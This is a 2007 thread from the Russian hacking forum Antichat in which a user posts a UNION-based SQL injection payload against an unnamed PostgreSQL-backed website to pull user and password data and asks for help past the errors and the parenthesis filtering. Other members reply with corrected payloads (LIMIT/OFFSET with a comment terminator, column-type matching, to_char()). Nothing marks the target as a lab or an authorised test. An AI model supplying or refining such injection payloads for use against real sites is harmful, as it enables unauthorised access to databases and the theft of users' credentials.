ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Sql
  #1  
Старый 24.07.2007, 18:46
MAAAD
Новичок
Регистрация: 04.10.2006
Сообщений: 8
Провел на форуме:
78129

Репутация: 0
По умолчанию Sql

Код:
id=-99999+union+select+1,null,null,user,null,6,null,null+from+user+password+limit+0,1
Выводится

Query failed: ERROR: LIMIT #,# syntax is not supported HINT: Use separate LIMIT and OFFSET clauses. in /var/www/.............

Скобки фильтруются, что можно сделать?!
 
Ответить с цитированием

  #2  
Старый 24.07.2007, 19:34
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

Не поддерживается такая маска limit`а, можно использовать только один операнд.
делай так
Код:
id=-9999+union+select+1,null,null,user,null,6,null,null+from+user+password+limit+1+offset+1/*
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #3  
Старый 24.07.2007, 19:41
MAAAD
Новичок
Регистрация: 04.10.2006
Сообщений: 8
Провел на форуме:
78129

Репутация: 0
По умолчанию

Цитата:
Сообщение от Scipio  
Не поддерживается такая маска limit`а, можно использовать только один операнд.
делай так
Код:
id=-9999+union+select+1,null,null,user,null,6,null,null+from+user+password+limit+1+offset+1/*

Я бы рад, но тогда сразу вылезает вот что:

Warning: pg_query() [function.pg-query]: Query failed: ERROR: UNION types integer and name cannot be matched in /var/www/

Warning: pg_fetch_object() expects parameter 1 to be resource, boolean given in /var/www/

Notice: Trying to get property of non-object in /var/www/
 
Ответить с цитированием

  #4  
Старый 27.07.2007, 13:05
MAAAD
Новичок
Регистрация: 04.10.2006
Сообщений: 8
Провел на форуме:
78129

Репутация: 0
По умолчанию

Что сделать?!
 
Ответить с цитированием

  #5  
Старый 27.07.2007, 13:24
MAAAD
Новичок
Регистрация: 04.10.2006
Сообщений: 8
Провел на форуме:
78129

Репутация: 0
По умолчанию

Ошибка запроса:Mixing of GROUP columns (MIN(),MAX(),COUNT()...) with no GROUP columns is illegal if there is no GROUP BY clause

А с этим что сделать?!
 
Ответить с цитированием

  #6  
Старый 27.07.2007, 13:48
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Цитата:
Warning: pg_query() [function.pg-query]: Query failed: ERROR: UNION types integer and name cannot be matched in /var/www/
типы данных не совпадают
пробуй в другие поля вставлять

Последний раз редактировалось Spyder; 27.07.2007 в 13:50..
 
Ответить с цитированием

  #7  
Старый 27.07.2007, 14:15
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357

Репутация: 3742


Отправить сообщение для blackybr с помощью ICQ Отправить сообщение для blackybr с помощью AIM Отправить сообщение для blackybr с помощью Yahoo
По умолчанию

to_char()

а вообще есть статья, в которой все подробно описано

статья от spyder вроде
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
SQL Injection: Modes of Attack, Defence, and Why It Matters bxN5 Forum for discussion of ANTICHAT 1 09.04.2007 19:07
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ